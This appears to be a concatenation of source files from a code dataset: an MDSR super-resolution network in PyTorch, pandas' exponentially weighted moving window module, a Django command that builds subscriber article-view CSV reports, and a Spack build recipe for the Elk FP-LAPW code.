4a210d0c546c86bb93fc7cf915d9df44f9315653 | 1,837 | py | Python | SR/code/model/mdsr.py | Whoo-jl/Pyramid-Attention-Networks | ec20b3fecf590bebc7188eac03a571e69aa6088f | [
"MIT"
] | 338 | 2020-04-30T01:07:49.000Z | 2022-03-29T03:36:56.000Z | code/model/mdsr.py | HarukiYqM/3D_Appearance_SR | 0e4d3a4476afe1ccf16f0e8fee3d697c0d204395 | [
"MIT"
] | 21 | 2020-05-02T14:10:51.000Z | 2021-05-21T08:32:42.000Z | code/model/mdsr.py | HarukiYqM/3D_Appearance_SR | 0e4d3a4476afe1ccf16f0e8fee3d697c0d204395 | [
"MIT"
] | 56 | 2020-04-30T08:09:38.000Z | 2022-03-14T06:23:34.000Z | from model import common
import torch.nn as nn
def make_model(args, parent=False):
return MDSR(args)
class MDSR(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(MDSR, self).__init__()
n_resblocks = args.n_resblocks
n_feats = args.n_feats
kernel_size = 3
self.scale_idx = 0
act = nn.ReLU(True)
rgb_mean = (0.4488, 0.4371, 0.4040)
rgb_std = (1.0, 1.0, 1.0)
self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)
m_head = [conv(args.n_colors, n_feats, kernel_size)]
self.pre_process = nn.ModuleList([
nn.Sequential(
common.ResBlock(conv, n_feats, 5, act=act),
common.ResBlock(conv, n_feats, 5, act=act)
) for _ in args.scale
])
m_body = [
common.ResBlock(
conv, n_feats, kernel_size, act=act
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size))
self.upsample = nn.ModuleList([
common.Upsampler(
conv, s, n_feats, act=False
) for s in args.scale
])
m_tail = [conv(n_feats, args.n_colors, kernel_size)]
self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
def forward(self, x):
x = self.sub_mean(x)
x = self.head(x)
x = self.pre_process[self.scale_idx](x)
res = self.body(x)
res += x
x = self.upsample[self.scale_idx](res)
x = self.tail(x)
x = self.add_mean(x)
return x
def set_scale(self, scale_idx):
self.scale_idx = scale_idx
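# --- Editor's usage sketch (assumption: not part of the original file) ---
# MDSR reads its hyper-parameters from an EDSR-style `args` namespace; the
# field names below mirror exactly the attributes accessed in __init__.
def _example_build_mdsr():  # hypothetical helper, never called here
    from argparse import Namespace
    args = Namespace(n_resblocks=16, n_feats=64, scale=[2, 3, 4],
                     rgb_range=255, n_colors=3)
    model = make_model(args)
    model.set_scale(0)  # select the x2 branch before running forward()
    return model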
| 26.623188 | 78 | 0.567229 |
4a210d8b47e9b2d9f9e0ce35cec69e343cf853ad | 23,207 | py | Python | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2021-12-07T13:37:31.000Z | 2021-12-07T13:37:31.000Z | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/core/window/ewm.py | mujtahidalam/pandas | 526468c8fe6fc5157aaf2fce327c5ab2a3350f49 | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import annotations
import datetime
from functools import partial
from textwrap import dedent
import warnings
import numpy as np
from pandas._libs.tslibs import Timedelta
import pandas._libs.window.aggregations as window_aggregations
from pandas._typing import (
Axis,
FrameOrSeries,
FrameOrSeriesUnion,
TimedeltaConvertibleTypes,
)
from pandas.compat.numpy import function as nv
from pandas.util._decorators import doc
from pandas.core.dtypes.common import is_datetime64_ns_dtype
from pandas.core.dtypes.missing import isna
import pandas.core.common as common # noqa: PDF018
from pandas.core.util.numba_ import maybe_use_numba
from pandas.core.window.common import zsqrt
from pandas.core.window.doc import (
_shared_docs,
args_compat,
create_section_header,
kwargs_compat,
template_header,
template_returns,
template_see_also,
)
from pandas.core.window.indexers import (
BaseIndexer,
ExponentialMovingWindowIndexer,
GroupbyIndexer,
)
from pandas.core.window.numba_ import generate_numba_groupby_ewma_func
from pandas.core.window.rolling import (
BaseWindow,
BaseWindowGroupby,
)
def get_center_of_mass(
comass: float | None,
span: float | None,
halflife: float | None,
alpha: float | None,
) -> float:
valid_count = common.count_not_none(comass, span, halflife, alpha)
if valid_count > 1:
raise ValueError("comass, span, halflife, and alpha are mutually exclusive")
# Convert to center of mass; domain checks ensure 0 < alpha <= 1
if comass is not None:
if comass < 0:
raise ValueError("comass must satisfy: comass >= 0")
elif span is not None:
if span < 1:
raise ValueError("span must satisfy: span >= 1")
comass = (span - 1) / 2
elif halflife is not None:
if halflife <= 0:
raise ValueError("halflife must satisfy: halflife > 0")
decay = 1 - np.exp(np.log(0.5) / halflife)
comass = 1 / decay - 1
elif alpha is not None:
if alpha <= 0 or alpha > 1:
raise ValueError("alpha must satisfy: 0 < alpha <= 1")
comass = (1 - alpha) / alpha
else:
raise ValueError("Must pass one of comass, span, halflife, or alpha")
return float(comass)
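# Editor's illustration (not part of pandas): the conversions above imply, e.g.,
# span=9 -> comass = (9 - 1)/2 = 4.0 and alpha=0.2 -> comass = (1 - 0.2)/0.2 = 4.0,
# so ewm(span=9), ewm(alpha=0.2) and ewm(com=4) parametrize the same decay.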
def _calculate_deltas(
times: str | np.ndarray | FrameOrSeries | None,
halflife: float | TimedeltaConvertibleTypes | None,
) -> np.ndarray:
"""
Return the diff of the times divided by the half-life. These values are used in
the calculation of the ewm mean.
Parameters
----------
times : str, np.ndarray, Series, default None
Times corresponding to the observations. Must be monotonically increasing
and ``datetime64[ns]`` dtype.
halflife : float, str, timedelta, optional
Half-life specifying the decay
Returns
-------
np.ndarray
Diff of the times divided by the half-life
"""
# error: Item "str" of "Union[str, ndarray, FrameOrSeries, None]" has no
# attribute "view"
# error: Item "None" of "Union[str, ndarray, FrameOrSeries, None]" has no
# attribute "view"
_times = np.asarray(
times.view(np.int64), dtype=np.float64 # type: ignore[union-attr]
)
_halflife = float(Timedelta(halflife).value)
return np.diff(_times) / _halflife
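# Editor's note (not part of pandas): with observations exactly one day apart
# and halflife='1 day', every delta is 1.0, i.e. the weight halves per step;
# unevenly spaced times yield proportionally larger or smaller exponents.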
class ExponentialMovingWindow(BaseWindow):
r"""
Provide exponential weighted (EW) functions.
Available EW functions: ``mean()``, ``var()``, ``std()``, ``corr()``, ``cov()``.
Exactly one parameter: ``com``, ``span``, ``halflife``, or ``alpha`` must be
provided.
Parameters
----------
com : float, optional
Specify decay in terms of center of mass,
:math:`\alpha = 1 / (1 + com)`, for :math:`com \geq 0`.
span : float, optional
Specify decay in terms of span,
:math:`\alpha = 2 / (span + 1)`, for :math:`span \geq 1`.
halflife : float, str, timedelta, optional
Specify decay in terms of half-life,
:math:`\alpha = 1 - \exp\left(-\ln(2) / halflife\right)`, for
:math:`halflife > 0`.
If ``times`` is specified, the time unit (str or timedelta) over which an
observation decays to half its value. Only applicable to ``mean()``
and halflife value will not apply to the other functions.
.. versionadded:: 1.1.0
alpha : float, optional
Specify smoothing factor :math:`\alpha` directly,
:math:`0 < \alpha \leq 1`.
min_periods : int, default 0
Minimum number of observations in window required to have a value
(otherwise result is NA).
adjust : bool, default True
Divide by decaying adjustment factor in beginning periods to account
for imbalance in relative weightings (viewing EWMA as a moving average).
- When ``adjust=True`` (default), the EW function is calculated using weights
:math:`w_i = (1 - \alpha)^i`. For example, the EW moving average of the series
[:math:`x_0, x_1, ..., x_t`] would be:
.. math::
y_t = \frac{x_t + (1 - \alpha)x_{t-1} + (1 - \alpha)^2 x_{t-2} + ... + (1 -
\alpha)^t x_0}{1 + (1 - \alpha) + (1 - \alpha)^2 + ... + (1 - \alpha)^t}
- When ``adjust=False``, the exponentially weighted function is calculated
recursively:
.. math::
\begin{split}
y_0 &= x_0\\
y_t &= (1 - \alpha) y_{t-1} + \alpha x_t,
\end{split}
ignore_na : bool, default False
Ignore missing values when calculating weights; specify ``True`` to reproduce
pre-0.15.0 behavior.
- When ``ignore_na=False`` (default), weights are based on absolute positions.
For example, the weights of :math:`x_0` and :math:`x_2` used in calculating
the final weighted average of [:math:`x_0`, None, :math:`x_2`] are
:math:`(1-\alpha)^2` and :math:`1` if ``adjust=True``, and
:math:`(1-\alpha)^2` and :math:`\alpha` if ``adjust=False``.
- When ``ignore_na=True`` (reproducing pre-0.15.0 behavior), weights are based
on relative positions. For example, the weights of :math:`x_0` and :math:`x_2`
used in calculating the final weighted average of
[:math:`x_0`, None, :math:`x_2`] are :math:`1-\alpha` and :math:`1` if
``adjust=True``, and :math:`1-\alpha` and :math:`\alpha` if ``adjust=False``.
axis : {0, 1}, default 0
The axis to use. The value 0 identifies the rows, and 1
identifies the columns.
times : str, np.ndarray, Series, default None
.. versionadded:: 1.1.0
Times corresponding to the observations. Must be monotonically increasing and
``datetime64[ns]`` dtype.
If str, the name of the column in the DataFrame representing the times.
If 1-D array like, a sequence with the same shape as the observations.
Only applicable to ``mean()``.
Returns
-------
DataFrame
A Window sub-classed for the particular operation.
See Also
--------
rolling : Provides rolling window calculations.
expanding : Provides expanding transformations.
Notes
-----
More details can be found at:
:ref:`Exponentially weighted windows <window.exponentially_weighted>`.
Examples
--------
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
>>> df
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.ewm(com=0.5).mean()
B
0 0.000000
1 0.750000
2 1.615385
3 1.615385
4 3.670213
Specifying ``times`` with a timedelta ``halflife`` when computing mean.
>>> times = ['2020-01-01', '2020-01-03', '2020-01-10', '2020-01-15', '2020-01-17']
>>> df.ewm(halflife='4 days', times=pd.DatetimeIndex(times)).mean()
B
0 0.000000
1 0.585786
2 1.523889
3 1.523889
4 3.233686
"""
_attributes = [
"com",
"span",
"halflife",
"alpha",
"min_periods",
"adjust",
"ignore_na",
"axis",
"times",
]
def __init__(
self,
obj: FrameOrSeries,
com: float | None = None,
span: float | None = None,
halflife: float | TimedeltaConvertibleTypes | None = None,
alpha: float | None = None,
min_periods: int = 0,
adjust: bool = True,
ignore_na: bool = False,
axis: Axis = 0,
times: str | np.ndarray | FrameOrSeries | None = None,
):
super().__init__(
obj=obj,
min_periods=max(int(min_periods), 1),
on=None,
center=False,
closed=None,
method="single",
axis=axis,
)
self.com = com
self.span = span
self.halflife = halflife
self.alpha = alpha
self.adjust = adjust
self.ignore_na = ignore_na
self.times = times
if self.times is not None:
if not self.adjust:
raise NotImplementedError("times is not supported with adjust=False.")
if isinstance(self.times, str):
self.times = self._selected_obj[self.times]
if not is_datetime64_ns_dtype(self.times):
raise ValueError("times must be datetime64[ns] dtype.")
# error: Argument 1 to "len" has incompatible type "Union[str, ndarray,
# FrameOrSeries, None]"; expected "Sized"
if len(self.times) != len(obj): # type: ignore[arg-type]
raise ValueError("times must be the same length as the object.")
if not isinstance(self.halflife, (str, datetime.timedelta)):
raise ValueError(
"halflife must be a string or datetime.timedelta object"
)
if isna(self.times).any():
raise ValueError("Cannot convert NaT values to integer")
self._deltas = _calculate_deltas(self.times, self.halflife)
# Halflife is no longer applicable when calculating COM
# But allow COM to still be calculated if the user passes other decay args
if common.count_not_none(self.com, self.span, self.alpha) > 0:
self._com = get_center_of_mass(self.com, self.span, None, self.alpha)
else:
self._com = 1.0
else:
if self.halflife is not None and isinstance(
self.halflife, (str, datetime.timedelta)
):
raise ValueError(
"halflife can only be a timedelta convertible argument if "
"times is not None."
)
# Without times, points are equally spaced
self._deltas = np.ones(max(len(self.obj) - 1, 0), dtype=np.float64)
self._com = get_center_of_mass(
# error: Argument 3 to "get_center_of_mass" has incompatible type
# "Union[float, Any, None, timedelta64, signedinteger[_64Bit]]";
# expected "Optional[float]"
self.com,
self.span,
self.halflife, # type: ignore[arg-type]
self.alpha,
)
def _get_window_indexer(self) -> BaseIndexer:
"""
Return an indexer class that will compute the window start and end bounds
"""
return ExponentialMovingWindowIndexer()
@doc(
_shared_docs["aggregate"],
see_also=dedent(
"""
See Also
--------
pandas.DataFrame.rolling.aggregate
"""
),
examples=dedent(
"""
Examples
--------
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6], "C": [7, 8, 9]})
>>> df
A B C
0 1 4 7
1 2 5 8
2 3 6 9
>>> df.ewm(alpha=0.5).mean()
A B C
0 1.000000 4.000000 7.000000
1 1.666667 4.666667 7.666667
2 2.428571 5.428571 8.428571
"""
),
klass="Series/Dataframe",
axis="",
)
def aggregate(self, func, *args, **kwargs):
return super().aggregate(func, *args, **kwargs)
agg = aggregate
@doc(
template_header,
create_section_header("Parameters"),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) mean",
agg_method="mean",
)
def mean(self, *args, **kwargs):
nv.validate_window_func("mean", args, kwargs)
window_func = window_aggregations.ewma
window_func = partial(
window_func,
com=self._com,
adjust=self.adjust,
ignore_na=self.ignore_na,
deltas=self._deltas,
)
return self._apply(window_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) standard deviation",
agg_method="std",
)
def std(self, bias: bool = False, *args, **kwargs):
nv.validate_window_func("std", args, kwargs)
return zsqrt(self.var(bias=bias, **kwargs))
def vol(self, bias: bool = False, *args, **kwargs):
warnings.warn(
(
"vol is deprecated will be removed in a future version. "
"Use std instead."
),
FutureWarning,
stacklevel=2,
)
return self.std(bias, *args, **kwargs)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
args_compat,
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) variance",
agg_method="var",
)
def var(self, bias: bool = False, *args, **kwargs):
nv.validate_window_func("var", args, kwargs)
window_func = window_aggregations.ewmcov
wfunc = partial(
window_func,
com=self._com,
adjust=self.adjust,
ignore_na=self.ignore_na,
bias=bias,
)
def var_func(values, begin, end, min_periods):
return wfunc(values, begin, end, min_periods, values)
return self._apply(var_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
        other : Series or DataFrame, optional
If not supplied then will default to self and produce pairwise
output.
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame
inputs. In the case of missing elements, only complete pairwise
observations will be used.
bias : bool, default False
Use a standard estimation bias correction.
"""
).replace("\n", "", 1),
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) sample covariance",
agg_method="cov",
)
def cov(
self,
other: FrameOrSeriesUnion | None = None,
pairwise: bool | None = None,
bias: bool = False,
**kwargs,
):
from pandas import Series
def cov_func(x, y):
x_array = self._prep_values(x)
y_array = self._prep_values(y)
window_indexer = self._get_window_indexer()
min_periods = (
self.min_periods
if self.min_periods is not None
else window_indexer.window_size
)
start, end = window_indexer.get_window_bounds(
num_values=len(x_array),
min_periods=min_periods,
center=self.center,
closed=self.closed,
)
result = window_aggregations.ewmcov(
x_array,
start,
end,
# error: Argument 4 to "ewmcov" has incompatible type
# "Optional[int]"; expected "int"
self.min_periods, # type: ignore[arg-type]
y_array,
self._com,
self.adjust,
self.ignore_na,
bias,
)
return Series(result, index=x.index, name=x.name)
return self._apply_pairwise(self._selected_obj, other, pairwise, cov_func)
@doc(
template_header,
create_section_header("Parameters"),
dedent(
"""
other : Series or DataFrame, optional
If not supplied then will default to self and produce pairwise
output.
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame
inputs. In the case of missing elements, only complete pairwise
observations will be used.
"""
).replace("\n", "", 1),
kwargs_compat,
create_section_header("Returns"),
template_returns,
create_section_header("See Also"),
template_see_also[:-1],
window_method="ewm",
aggregation_description="(exponential weighted moment) sample correlation",
agg_method="corr",
)
def corr(
self,
other: FrameOrSeriesUnion | None = None,
pairwise: bool | None = None,
**kwargs,
):
from pandas import Series
def cov_func(x, y):
x_array = self._prep_values(x)
y_array = self._prep_values(y)
window_indexer = self._get_window_indexer()
min_periods = (
self.min_periods
if self.min_periods is not None
else window_indexer.window_size
)
start, end = window_indexer.get_window_bounds(
num_values=len(x_array),
min_periods=min_periods,
center=self.center,
closed=self.closed,
)
def _cov(X, Y):
return window_aggregations.ewmcov(
X,
start,
end,
min_periods,
Y,
self._com,
self.adjust,
self.ignore_na,
True,
)
with np.errstate(all="ignore"):
cov = _cov(x_array, y_array)
x_var = _cov(x_array, x_array)
y_var = _cov(y_array, y_array)
result = cov / zsqrt(x_var * y_var)
return Series(result, index=x.index, name=x.name)
return self._apply_pairwise(self._selected_obj, other, pairwise, cov_func)
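# --- Editor's illustration (not part of pandas) ---
# A minimal check of the adjust=False recursion documented on the class:
#     y_t = (1 - alpha) * y_{t-1} + alpha * x_t
def _example_ewm_recursion():  # hypothetical helper, never called here
    import pandas as pd
    x = pd.Series([0.0, 1.0, 2.0])
    alpha = 0.5
    y = [x.iloc[0]]
    for t in range(1, len(x)):
        y.append((1 - alpha) * y[-1] + alpha * x.iloc[t])
    result = x.ewm(alpha=alpha, adjust=False).mean()
    assert all(abs(a - b) < 1e-12 for a, b in zip(result, y))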
class ExponentialMovingWindowGroupby(BaseWindowGroupby, ExponentialMovingWindow):
"""
Provide an exponential moving window groupby implementation.
"""
_attributes = ExponentialMovingWindow._attributes + BaseWindowGroupby._attributes
def __init__(self, obj, *args, _grouper=None, **kwargs):
super().__init__(obj, *args, _grouper=_grouper, **kwargs)
if not obj.empty and self.times is not None:
# sort the times and recalculate the deltas according to the groups
groupby_order = np.concatenate(list(self._grouper.indices.values()))
self._deltas = _calculate_deltas(
self.times.take(groupby_order), # type: ignore[union-attr]
self.halflife,
)
def _get_window_indexer(self) -> GroupbyIndexer:
"""
Return an indexer class that will compute the window start and end bounds
Returns
-------
GroupbyIndexer
"""
window_indexer = GroupbyIndexer(
groupby_indicies=self._grouper.indices,
window_indexer=ExponentialMovingWindowIndexer,
)
return window_indexer
def mean(self, engine=None, engine_kwargs=None):
"""
Parameters
----------
engine : str, default None
* ``'cython'`` : Runs mean through C-extensions from cython.
* ``'numba'`` : Runs mean through JIT compiled code from numba.
Only available when ``raw`` is set to ``True``.
* ``None`` : Defaults to ``'cython'`` or globally setting
``compute.use_numba``
.. versionadded:: 1.2.0
engine_kwargs : dict, default None
* For ``'cython'`` engine, there are no accepted ``engine_kwargs``
* For ``'numba'`` engine, the engine can accept ``nopython``, ``nogil``
and ``parallel`` dictionary keys. The values must either be ``True`` or
``False``. The default ``engine_kwargs`` for the ``'numba'`` engine is
``{'nopython': True, 'nogil': False, 'parallel': False}``.
.. versionadded:: 1.2.0
Returns
-------
Series or DataFrame
Return type is determined by the caller.
"""
if maybe_use_numba(engine):
groupby_ewma_func = generate_numba_groupby_ewma_func(
engine_kwargs, self._com, self.adjust, self.ignore_na, self._deltas
)
return self._apply(
groupby_ewma_func,
numba_cache_key=(lambda x: x, "groupby_ewma"),
)
elif engine in ("cython", None):
if engine_kwargs is not None:
raise ValueError("cython engine does not accept engine_kwargs")
return super().mean()
else:
raise ValueError("engine must be either 'numba' or 'cython'")
| 34.127941 | 88 | 0.570345 |
4a210ed80ec28506cd5e01cab09101738d8d7d22 | 4,840 | py | Python | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 8 | 2020-12-15T17:11:08.000Z | 2021-12-13T22:08:33.000Z | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 28 | 2020-12-15T17:34:03.000Z | 2022-02-01T04:09:10.000Z | portal/apps/dashboard/management/commands/subscribers.py | djpeluca/utopia-cms | 1e444afea565fdc734abf449b8ebe9b7c2c47d80 | [
"BSD-3-Clause"
] | 7 | 2020-12-15T19:59:17.000Z | 2021-11-24T16:47:06.000Z | from os.path import join
from unicodecsv import writer
import operator
from progress.bar import Bar
from django.core.management.base import BaseCommand
from django.conf import settings
from core.models import Article, ArticleViewedBy, Publication, Section
class Command(BaseCommand):
help = u'Generates the articles report content for subscribers visits'
def add_arguments(self, parser):
parser.add_argument(
'--progress', action='store_true', default=False, dest='progress', help=u'Show a progress bar'
)
parser.add_argument(
'--published-since',
action='store',
type=unicode,
dest='published-since',
help='Only count visits of articles published at or after this date, in format : YYYY-mm-dd',
)
parser.add_argument(
'--views-since',
action='store',
type=unicode,
dest='views-since',
help='Only count visits at or after this date, in format : YYYY-mm-dd',
)
parser.add_argument(
'--out-prefix',
action='store',
type=unicode,
dest='out-prefix',
default=u'',
help=u"Don't make changes to existing files and save generated files with this prefix",
)
def handle(self, *args, **options):
published_since, views_since = options.get('published-since'), options.get('views-since')
filter_articles_kwargs = {'is_published': True, 'views__gt': 0}
filter_views_kwargs = {'user__is_staff': False, 'user__subscriber__isnull': False}
if published_since:
filter_articles_kwargs.update({'date_published__gte': published_since})
if views_since:
filter_views_kwargs.update({'viewed_at__gte': views_since})
verbosity = options.get('verbosity')
if verbosity > '1':
gen_msg = u'Generating reports for articles published '
gen_msg += ((u'since %s' % published_since) if published_since else u'on any date') + u' and views '
            print(gen_msg + ((u'since %s' % views_since) if views_since else u'on any date') + u' ...')
target_articles, articles, articles_sections = Article.objects.filter(**filter_articles_kwargs), [], {}
bar = Bar('Processing articles', max=target_articles.count()) if options.get('progress') else None
for article in target_articles.select_related('main_section__edition').iterator():
filter_views_kwargs.update({'article': article})
views, article_publications = 0, article.publications()
for article_view in ArticleViewedBy.objects.select_related(
'user__subscriber'
).filter(**filter_views_kwargs).iterator():
if (
article_view.user.subscriber.is_subscriber()
or any([article_view.user.subscriber.is_subscriber(p.slug) for p in article_publications])
):
views += 1
if views:
articles.append((article.id, views))
main_section = article.main_section
if main_section:
main_publication_id = main_section.edition.publication_id
main_section_id = main_section.section_id
section_views = articles_sections.get((main_publication_id, main_section_id), 0)
section_views += views
articles_sections[(main_publication_id, main_section_id)] = section_views
if bar:
bar.next()
if bar:
bar.finish()
articles.sort(key=operator.itemgetter(1), reverse=True)
out_prefix = options.get('out-prefix')
w = writer(open(join(settings.DASHBOARD_REPORTS_PATH, '%ssubscribers.csv' % out_prefix), 'w'))
i = 0
for article_id, views in articles:
article = Article.objects.get(id=article_id)
i += 1
w.writerow(
[
i,
article.date_published.date(),
article.get_absolute_url(),
views,
', '.join(['%s' % ar for ar in article.articlerel_set.all()]),
]
)
as_list = [(p, s, v) for (p, s), v in articles_sections.iteritems()]
as_list.sort(key=operator.itemgetter(2), reverse=True)
w = writer(open(join(settings.DASHBOARD_REPORTS_PATH, '%ssubscribers_sections.csv' % out_prefix), 'w'))
i = 0
for publication_id, section_id, views in as_list:
i += 1
w.writerow(
[i, Publication.objects.get(id=publication_id).name, Section.objects.get(id=section_id).name, views]
)
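# Editor's usage sketch (assumption: standard Django management-command wiring):
#   python manage.py subscribers --published-since 2020-01-01 \
#       --views-since 2020-06-01 --out-prefix test_ --progress
# writes test_subscribers.csv and test_subscribers_sections.csv under
# settings.DASHBOARD_REPORTS_PATH.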
| 39.672131 | 116 | 0.592769 |
4a210f85cc49bed7bee709d97c408a8b6b0596d6 | 190 | py | Python | Python_Challenge_115/2/6.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | Python_Challenge_115/2/6.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | null | null | null | Python_Challenge_115/2/6.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | '''
Statement
Given a positive real number, print its first digit to the right of the decimal point.
Example input
1.79
Example output
7
'''
num = float(input())
print(int(num * 10 % 10))
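# Editor's note (not part of the original solution): multiplying the float can
# drift on some inputs, so a string-based sketch sidesteps rounding entirely:
#     print(input().split('.')[1][0])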
| 14.615385 | 86 | 0.710526 |
4a210fe32805c8b31ebe4291d2d0e84af7434378 | 4,723 | py | Python | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/elk/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Elk(MakefilePackage):
"""An all-electron full-potential linearised augmented-plane wave
(FP-LAPW) code with many advanced features."""
homepage = 'http://elk.sourceforge.net/'
url = 'https://sourceforge.net/projects/elk/files/elk-3.3.17.tgz'
version('3.3.17', sha256='c9b87ae4ef367ed43afc2d43eb961745668e40670995e8e24c13db41b7e85d73')
# Elk provides these libraries, but allows you to specify your own
variant('blas', default=True,
description='Build with custom BLAS library')
variant('lapack', default=True,
description='Build with custom LAPACK library')
variant('fft', default=True,
description='Build with custom FFT library')
# Elk does not provide these libraries, but allows you to use them
variant('mpi', default=True,
description='Enable MPI parallelism')
variant('openmp', default=True,
description='Enable OpenMP support')
variant('libxc', default=True,
description='Link to Libxc functional library')
depends_on('blas', when='+blas')
depends_on('lapack', when='+lapack')
depends_on('fftw', when='+fft')
depends_on('mpi@2:', when='+mpi')
depends_on('libxc', when='+libxc')
# Cannot be built in parallel
parallel = False
def edit(self, spec, prefix):
# Dictionary of configuration options
config = {
'MAKE': 'make',
'AR': 'ar'
}
# Compiler-specific flags
flags = ''
if self.compiler.name == 'intel':
flags = '-O3 -ip -unroll -no-prec-div'
elif self.compiler.name == 'gcc':
flags = '-O3 -ffast-math -funroll-loops'
elif self.compiler.name == 'pgi':
flags = '-O3 -lpthread'
elif self.compiler.name == 'g95':
flags = '-O3 -fno-second-underscore'
elif self.compiler.name == 'nag':
flags = '-O4 -kind=byte -dusty -dcfuns'
elif self.compiler.name == 'xl':
flags = '-O3'
config['F90_OPTS'] = flags
config['F77_OPTS'] = flags
# BLAS/LAPACK support
# Note: BLAS/LAPACK must be compiled with OpenMP support
# if the +openmp variant is chosen
blas = 'blas.a'
lapack = 'lapack.a'
if '+blas' in spec:
blas = spec['blas'].libs.joined()
if '+lapack' in spec:
lapack = spec['lapack'].libs.joined()
# lapack must come before blas
config['LIB_LPK'] = ' '.join([lapack, blas])
# FFT support
if '+fft' in spec:
config['LIB_FFT'] = join_path(spec['fftw'].prefix.lib,
'libfftw3.so')
config['SRC_FFT'] = 'zfftifc_fftw.f90'
else:
config['LIB_FFT'] = 'fftlib.a'
config['SRC_FFT'] = 'zfftifc.f90'
# MPI support
if '+mpi' in spec:
config['F90'] = spec['mpi'].mpifc
config['F77'] = spec['mpi'].mpif77
else:
config['F90'] = spack_fc
config['F77'] = spack_f77
config['SRC_MPI'] = 'mpi_stub.f90'
# OpenMP support
if '+openmp' in spec:
config['F90_OPTS'] += ' ' + self.compiler.openmp_flag
config['F77_OPTS'] += ' ' + self.compiler.openmp_flag
else:
config['SRC_OMP'] = 'omp_stub.f90'
# Libxc support
if '+libxc' in spec:
config['LIB_libxc'] = ' '.join([
join_path(spec['libxc'].prefix.lib, 'libxcf90.so'),
join_path(spec['libxc'].prefix.lib, 'libxc.so')
])
config['SRC_libxc'] = ' '.join([
'libxc_funcs.f90',
'libxc.f90',
'libxcifc.f90'
])
else:
config['SRC_libxc'] = 'libxcifc_stub.f90'
# Write configuration options to include file
with open('make.inc', 'w') as inc:
for key in config:
inc.write('{0} = {1}\n'.format(key, config[key]))
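    # Editor's illustration (not part of the package): with a spec such as
    # `elk+mpi+openmp %gcc`, the loop above would emit make.inc lines like
    #     F90 = mpif90
    #     F90_OPTS = -O3 -ffast-math -funroll-loops -fopenmp
    #     LIB_LPK = <lapack libs> <blas libs>
    # with the exact values depending on the concrete spec and compilers.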
def install(self, spec, prefix):
# The Elk Makefile does not provide an install target
mkdir(prefix.bin)
install('src/elk', prefix.bin)
install('src/eos/eos', prefix.bin)
